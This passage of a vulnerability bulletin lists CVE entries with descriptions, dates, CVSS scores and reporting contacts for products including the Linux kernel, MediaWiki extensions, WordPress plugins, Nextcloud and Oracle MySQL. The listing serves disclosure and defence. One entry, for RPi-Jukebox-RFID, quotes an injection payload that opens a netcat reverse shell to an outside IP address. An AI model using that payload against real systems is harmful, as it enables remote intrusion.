lesterchan -- wp-postratingsThe WP-PostRatings WordPress plugin before 1.86.1 does not sanitise the postratings_image parameter from its options page (wp-admin/admin.php?page=wp-postratings/postratings-options.php). Even though the page is only accessible to administrators, and protected against CSRF attacks, the issue is still exploitable when the unfiltered_html capability is disabled.2024-01-164.8CVE-2021-25117
contact@wpscan.com
linux -- kernelA Null pointer dereference problem was found in ida_free in lib/idr.c in the Linux Kernel. This issue may allow an attacker using this library to cause a denial of service problem due to a missing check at a function return.2024-01-156.5CVE-2023-6915
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
linux -- kernelAn out-of-bounds memory read flaw was found in receive_encrypted_standard in fs/smb/client/smb2ops.c in the SMB Client sub-component in the Linux Kernel. This issue occurs due to integer underflow on the memcpy length, leading to a denial of service.2024-01-156.8CVE-2024-0565
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
linux -- kernelA flaw was found in the Netfilter subsystem in the Linux kernel. The issue is in the nft_byteorder_eval() function, where the code iterates through a loop and writes to the `dst` array. On each iteration, 8 bytes are written, but `dst` is an array of u32, so each element only has space for 4 bytes. That means every iteration overwrites part of the previous element corrupting this array of u32. This flaw allows a local user to cause a denial of service or potentially break NetFilter functionality.2024-01-186.6CVE-2024-0607
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
linux -- kernelNULL Pointer Dereference vulnerability in openEuler kernel on Linux (network modules) allows Pointer Manipulation. This vulnerability is associated with program files net/sched/sch_cbs.C. This issue affects openEuler kernel: from 4.19.90 before 4.19.90-2401.3.2024-01-185.5CVE-2021-33630
securities@openeuler.org
securities@openeuler.org
securities@openeuler.org
linux -- kernelInteger Overflow or Wraparound vulnerability in openEuler kernel on Linux (filesystem modules) allows Forced Integer Overflow.This issue affects openEuler kernel: from 4.19.90 before 4.19.90-2401.3, from 5.10.0-60.18.0 before 5.10.0-183.0.0.2024-01-185.5CVE-2021-33631
securities@openeuler.org
securities@openeuler.org
securities@openeuler.org
securities@openeuler.org
securities@openeuler.org
securities@openeuler.org
securities@openeuler.org
securities@openeuler.org
linux -- kernelAn issue was discovered in drivers/input/input.c in the Linux kernel before 5.17.10. An attacker can cause a denial of service (panic) because input_set_capability mishandles the situation in which an event code falls outside of a bitmap.2024-01-125.5CVE-2022-48619
cve@mitre.org
cve@mitre.org
linux -- kernelA flaw was found in the blkgs destruction path in block/blk-cgroup.c in the Linux kernel, leading to a cgroup blkio memory leakage problem. When a cgroup is being destroyed, cgroup_rstat_flush() is only called at css_release_work_fn(), which is called when the blkcg reference count reaches 0. This circular dependency will prevent blkcg and some blkgs from being freed after they are made offline. This issue may allow an attacker with a local access to cause system instability, such as an out of memory error.2024-01-125.5CVE-2024-0443
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
linux -- kernelA denial of service vulnerability due to a deadlock was found in sctp_auto_asconf_init in net/sctp/socket.c in the Linux kernel's SCTP subsystem. This flaw allows guests with local user privileges to trigger a deadlock and potentially crash the system.2024-01-174.7CVE-2024-0639
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
linux -- kernelA denial of service vulnerability was found in tipc_crypto_key_revoke in net/tipc/crypto.c in the Linux kernel's TIPC subsystem. This flaw allows guests with local user privileges to trigger a deadlock and potentially crash the system.2024-01-174.7CVE-2024-0641
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
macroturk_software_and_internet_technologies -- macro-belImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Macroturk Software and Internet Technologies Macro-Bel allows Reflected XSS.This issue affects Macro-Bel: before V.1.0.1.2024-01-186.1CVE-2023-7153
iletisim@usom.gov.tr
magneticone -- cart2cart:_magento_to_woocommerce_migrationMissing Authorization vulnerability in MagneticOne Cart2Cart: Magento to WooCommerce Migration.This issue affects Cart2Cart: Magento to WooCommerce Migration: from n/a through 2.0.0.2024-01-175.4CVE-2023-34379
audit@patchstack.com
mailmunch -- constant_contact_formsImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MailMunch Constant Contact Forms by MailMunch allows Stored XSS.This issue affects Constant Contact Forms by MailMunch: from n/a through 2.0.11.2024-01-135.4CVE-2024-22137
audit@patchstack.com
mediawiki -- mediawikiAn issue was discovered in the Cargo extension in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. The Special:Drilldown page allows XSS via artist, album, and position parameters because of applied filter values in drilldown/CargoAppliedFilter.php.2024-01-126.1CVE-2024-23173
cve@mitre.org
cve@mitre.org
mediawiki -- mediawikiAn issue was discovered in the WatchAnalytics extension in MediaWiki before 1.40.2. XSS can occur via the Special:PageStatistics page parameter.2024-01-126.1CVE-2024-23177
cve@mitre.org
cve@mitre.org
mediawiki -- mediawikiAn issue was discovered in the GlobalBlocking extension in MediaWiki before 1.40.2. For a Special:GlobalBlock?uselang=x-xss URI, i18n-based XSS can occur via the parentheses message. This affects subtitle links in buildSubtitleLinks.2024-01-126.1CVE-2024-23179
cve@mitre.org
cve@mitre.org
mediawiki -- mediawikiAn issue was discovered in the CampaignEvents extension in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. The Special:EventDetails page allows XSS via the x-xss language setting for internationalization (i18n).2024-01-125.4CVE-2024-23171
cve@mitre.org
cve@mitre.org
mediawiki -- mediawikiAn issue was discovered in the CheckUser extension in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. XSS can occur via message definitions. e.g., in SpecialCheckUserLog.2024-01-125.4CVE-2024-23172
cve@mitre.org
cve@mitre.org
mediawiki -- mediawikiAn issue was discovered in the PageTriage extension in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. XSS can occur via the rev-deleted-user, pagetriage-tags-quickfilter-label, pagetriage-triage, pagetriage-filter-date-range-format-placeholder, pagetriage-filter-date-range-to, pagetriage-filter-date-range-from, pagetriage-filter-date-range-heading, pagetriage-filter-set-button, or pagetriage-filter-reset-button message.2024-01-125.4CVE-2024-23174
cve@mitre.org
cve@mitre.org
mediawiki -- mediawikiAn issue was discovered in the Phonos extension in MediaWiki before 1.40.2. PhonosButton.js allows i18n-based XSS via the phonos-purge-needed-error message.2024-01-125.4CVE-2024-23178
cve@mitre.org
cve@mitre.org
miczflor -- rpi-jukebox-rfidA vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251540. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-196.3CVE-2024-0714
cna@vuldb.com
cna@vuldb.com
mock -- mockThe Mock software contains a vulnerability wherein an attacker could potentially exploit privilege escalation, enabling the execution of arbitrary code with root user privileges. This weakness stems from the absence of proper sandboxing during the expansion and execution of Jinja2 templates, which may be included in certain configuration parameters. While the Mock documentation advises treating users added to the mock group as privileged, certain build systems invoking mock on behalf of users might inadvertently permit less privileged users to define configuration tags. These tags could then be passed as parameters to mock during execution, potentially leading to the utilization of Jinja2 templates for remote privilege escalation and the execution of arbitrary code as the root user on the build server.2024-01-166.7CVE-2023-6395
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
monitorr_1.7.6m -- monitorr_1.7.6mA vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-194.7CVE-2024-0713
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
myeventon -- eventonThe EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not properly sanitise and escape a parameter before outputting it back in pages, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin2024-01-166.1CVE-2024-0233
contact@wpscan.com
myeventon -- eventonThe EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorisation in an AJAX action, and does not ensure that the post to be updated belong to the plugin, allowing unauthenticated users to update arbitrary post metadata.2024-01-166.1CVE-2024-0238
contact@wpscan.com
myeventon -- eventonThe EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorisation in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog2024-01-165.3CVE-2024-0235
contact@wpscan.com
myeventon -- eventonThe EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorisation in an AJAX action, allowing unauthenticated users to retrieve the settings of arbitrary virtual events, including any meeting password set (for example for Zoom)2024-01-165.3CVE-2024-0236
contact@wpscan.com
myeventon -- eventonThe EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorisation in some AJAX actions, allowing unauthenticated users to update virtual events settings, such as meeting URL, moderator, access details etc2024-01-165.3CVE-2024-0237
contact@wpscan.com
myeventon -- eventonThe EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 does not sanitize and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).2024-01-164.8CVE-2023-6005
contact@wpscan.com
myeventon -- eventonThe EventON WordPress plugin before 2.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored HTML Injection attacks even when the unfiltered_html capability is disallowed.2024-01-164.8CVE-2023-6046
contact@wpscan.com
mythemeshop -- url_shortener_by_mythemeshopMissing Authorization vulnerability in MyThemeShop URL Shortener by MyThemeShop.This issue affects URL Shortener by MyThemeShop: from n/a through 1.0.17.2024-01-175.4CVE-2023-23896
audit@patchstack.com
netapp -- clustered_data_ontapONTAP versions 9.4 and higher are susceptible to a vulnerability which when successfully exploited could lead to disclosure of sensitive information to unprivileged attackers when the object-store profiler command is being run by an administrative user.2024-01-126.5CVE-2024-21982
security-alert@netapp.com
nextcloud -- security-advisoriesNextcloud guests app is a utility to create guest users which can only see files shared with them. In affected versions users were able to load the first page of apps they were actually not allowed to access. Depending on the selection of apps installed this may present a permissions bypass. It is recommended that the Guests app is upgraded to 2.4.1, 2.5.1 or 3.0.1. There are no known workarounds for this vulnerability.2024-01-185.4CVE-2024-22402
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
nextcloud -- security-advisoriesNextcloud guests app is a utility to create guest users which can only see files shared with them. In affected versions users could change the allowed list of apps, allowing them to use apps that were not intended to be used. It is recommended that the Guests app is upgraded to 2.4.1, 2.5.1 or 3.0.1. There are no known workarounds for this vulnerability.2024-01-184.1CVE-2024-22401
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
nextcloud -- security-advisoriesNextcloud files Zip app is a tool to create zip archives from one or multiple files from within Nextcloud. In affected versions users can download "view-only" files by zipping the complete folder. It is recommended that the Files ZIP app is upgraded to 1.2.1, 1.4.1, or 1.5.0. Users unable to upgrade should disable the file zip app.2024-01-184.1CVE-2024-22404
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
nextend -- smart_slider_3Deserialization of Untrusted Data vulnerability in Nextend Smart Slider 3.This issue affects Smart Slider 3: from n/a through 3.5.1.9.2024-01-194.3CVE-2022-45845
audit@patchstack.com
nickmomrik -- simple_postThe Simple Post WordPress plugin through 1.1 does not sanitize user input when an authenticated user Text value, then it does not escape these values when outputting to the browser leading to an Authenticated Stored XSS Cross-Site Scripting issue.2024-01-165.4CVE-2021-24567
contact@wpscan.com
notary_project -- notary_projectThe Notary Project is a set of specifications and tools intended to provide a cross-industry standard for securing software supply chains by using authentic container images and other OCI artifacts. An external actor with control of a compromised container registry can provide outdated versions of OCI artifacts, such as Images. This could lead artifact consumers with relaxed trust policies (such as `permissive` instead of `strict`) to potentially use artifacts with signatures that are no longer valid, making them susceptible to any exploits those artifacts may contain. In Notary Project, an artifact publisher can control the validity period of artifact by specifying signature expiry during the signing process. Using shorter signature validity periods along with processes to periodically resign artifacts, allows artifact producers to ensure that their consumers will only receive up-to-date artifacts. Artifact consumers should correspondingly use a `strict` or equivalent trust policy that enforces signature expiry. Together these steps enable use of up-to-date artifacts and safeguard against rollback attack in the event of registry compromise. The Notary Project offers various signature validation options such as `permissive`, `audit` and `skip` to support various scenarios. These scenarios includes 1) situations demanding urgent workload deployment, necessitating the bypassing of expired or revoked signatures; 2) auditing of artifacts lacking signatures without interrupting workload; and 3) skipping of verification for specific images that might have undergone validation through alternative mechanisms. Additionally, the Notary Project supports revocation to ensure the signature freshness. Artifact publishers can sign with short-lived certificates and revoke older certificates when necessary. This revocation serves as a signal to inform artifact consumers that the corresponding unexpired artifact is no longer approved by the publisher. This enables the artifact publisher to control the validity of the signature independently of their ability to manage artifacts in a compromised registry.2024-01-194CVE-2024-23332
security-advisories@github.com
security-advisories@github.com
novel-plus -- novel-plusA vulnerability has been found in Novel-Plus 4.3.0-RC1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /novel/bookSetting/list. The manipulation of the argument sort leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251383.2024-01-185.5CVE-2024-0655
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
nozomi -- check_ point_IoT_integrationA missing authentication check in the WebSocket channel used for the Check Point IoT integration in Nozomi Networks Guardian and CMC, may allow an unauthenticated attacker to obtain assets data without authentication. Malicious unauthenticated users with knowledge on the underlying system may be able to extract asset information.2024-01-155.3CVE-2023-5253
prodsec@nozominetworks.com
nvidia -- dgx_a100_firmwareNVIDIA DGX A100 SBIOS contains a vulnerability where a user may cause a dynamic variable evaluation by local access. A successful exploit of this vulnerability may lead to denial of service.2024-01-125.5CVE-2023-31032
psirt@nvidia.com
obg -- ark_wysiwyg_comment_editorThe ark-commenteditor WordPress plugin through 2.15.6 does not properly sanitise or encode the comments when in Source editor, allowing attackers to inject an iFrame in the page and thus load arbitrary content from any page to the comment section2024-01-165.3CVE-2021-4227
contact@wpscan.com
opcua -- servertoolkitOPCUAServerToolkit will write a log message once an OPC UA client has successfully connected containing the client's self-defined description field.2024-01-165.3CVE-2023-7234
ics-cert@hq.dhs.gov
ics-cert@hq.dhs.gov
open_edX_platform -- open_edX_platformOpen edX Platform is a service-oriented platform for authoring and delivering online learning. A user with a JWT and more limited scopes could call endpoints exceeding their access. This vulnerability has been patched in commit 019888f.2024-01-136.4CVE-2024-22209
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
openkm -- openkmA Stored Cross-Site Scripting (XSS) vulnerability exists in OpenKM version 7.1.40 (dbb6e88) With Professional Extension that allows an authenticated user to upload a note on a file which acts as a stored XSS payload. Any user who opens the note of a document file will trigger the XSS.2024-01-135.4CVE-2023-50072
cve@mitre.org
oracle -- bi_publisherVulnerability in the Oracle BI Publisher product of Oracle Analytics (component: Web Server). Supported versions that are affected are 6.4.0.0.0, 7.0.0.0.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle BI Publisher. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle BI Publisher, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle BI Publisher accessible data as well as unauthorized read access to a subset of Oracle BI Publisher accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).2024-01-165.4CVE-2024-20979
secalert_us@oracle.com
oracle -- bi_publisherVulnerability in the Oracle BI Publisher product of Oracle Analytics (component: Web Server). The supported version that is affected is 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle BI Publisher. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle BI Publisher, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle BI Publisher accessible data as well as unauthorized read access to a subset of Oracle BI Publisher accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).2024-01-165.4CVE-2024-20987
secalert_us@oracle.com
oracle -- business_intelligenceVulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Pod Admin). Supported versions that are affected are 6.4.0.0.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. While the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 5.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N).2024-01-165CVE-2024-20904
secalert_us@oracle.com
oracle -- complex_maintenance\,_repair\,_and_overhaulVulnerability in the Oracle Complex Maintenance, Repair, and Overhaul product of Oracle Supply Chain (component: LOV). Supported versions that are affected are 11.5, 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Complex Maintenance, Repair, and Overhaul. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Complex Maintenance, Repair, and Overhaul, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Complex Maintenance, Repair, and Overhaul accessible data as well as unauthorized read access to a subset of Oracle Complex Maintenance, Repair, and Overhaul accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).2024-01-166.1CVE-2024-20942
secalert_us@oracle.com
oracle -- customer_interaction_historyVulnerability in the Oracle Customer Interaction History product of Oracle E-Business Suite (component: Outcome-Result). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Customer Interaction History. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Customer Interaction History, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Customer Interaction History accessible data as well as unauthorized read access to a subset of Oracle Customer Interaction History accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).2024-01-166.1CVE-2024-20950
secalert_us@oracle.com
oracle -- installed_baseVulnerability in the Oracle Installed Base product of Oracle E-Business Suite (component: Engineering Change Order). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Installed Base. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Installed Base, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Installed Base accessible data as well as unauthorized read access to a subset of Oracle Installed Base accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).2024-01-166.1CVE-2024-20934
secalert_us@oracle.com
oracle -- integrated_lights_out_manager_firmwareVulnerability in the Integrated Lights Out Manager (ILOM) product of Oracle Systems (component: System Management). Supported versions that are affected are 3, 4 and 5. Easily exploitable vulnerability allows high privileged attacker with network access via ICMP to compromise Integrated Lights Out Manager (ILOM). Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Integrated Lights Out Manager (ILOM), attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Integrated Lights Out Manager (ILOM) accessible data as well as unauthorized read access to a subset of Integrated Lights Out Manager (ILOM) accessible data. CVSS 3.1 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N).2024-01-164.8CVE-2024-20906
secalert_us@oracle.com
oracle -- istoreVulnerability in the Oracle iStore product of Oracle E-Business Suite (component: ECC). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle iStore. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle iStore, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle iStore accessible data as well as unauthorized read access to a subset of Oracle iStore accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).2024-01-166.1CVE-2024-20938
secalert_us@oracle.com
oracle -- isupportVulnerability in the Oracle iSupport product of Oracle E-Business Suite (component: Internal Operations). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle iSupport. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle iSupport, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle iSupport accessible data as well as unauthorized read access to a subset of Oracle iSupport accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).2024-01-165.4CVE-2024-20944
secalert_us@oracle.com
oracle -- knowledge_managementVulnerability in the Oracle Knowledge Management product of Oracle E-Business Suite (component: Create, Update, Authoring Flow). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Knowledge Management, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Knowledge Management accessible data as well as unauthorized read access to a subset of Oracle Knowledge Management accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).2024-01-166.1CVE-2024-20940
secalert_us@oracle.com
oracle -- knowledge_managementVulnerability in the Oracle Knowledge Management product of Oracle E-Business Suite (component: Setup, Admin). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Knowledge Management, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Knowledge Management accessible data as well as unauthorized read access to a subset of Oracle Knowledge Management accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).2024-01-166.1CVE-2024-20948
secalert_us@oracle.com
oracle -- mysqlVulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).2024-01-166.5CVE-2024-20961
secalert_us@oracle.com
oracle -- mysqlVulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Encryption). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).2024-01-166.5CVE-2024-20963
secalert_us@oracle.com
oracle -- mysqlVulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).2024-01-166.5CVE-2024-20973
secalert_us@oracle.com
oracle -- mysqlVulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.2.0 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).2024-01-166.5CVE-2024-20975
secalert_us@oracle.com
oracle -- mysqlVulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).2024-01-166.5CVE-2024-20977
secalert_us@oracle.com
oracle -- mysqlVulnerability in the MySQL Server product of Oracle MySQL (component: Server: UDF). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).2024-01-166.5CVE-2024-20985
secalert_us@oracle.com
oracle -- mysqlVulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).2024-01-165.5CVE-2024-20967
secalert_us@oracle.com
oracle -- mysqlVulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).2024-01-165.5CVE-2024-20969
secalert_us@oracle.com
oracle -- mysqlVulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).2024-01-164.9CVE-2024-20965
secalert_us@oracle.com
oracle -- mysqlVulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).2024-01-164.9CVE-2024-20971
secalert_us@oracle.com
oracle -- mysqlVulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).2024-01-164.9CVE-2024-20981
secalert_us@oracle.com
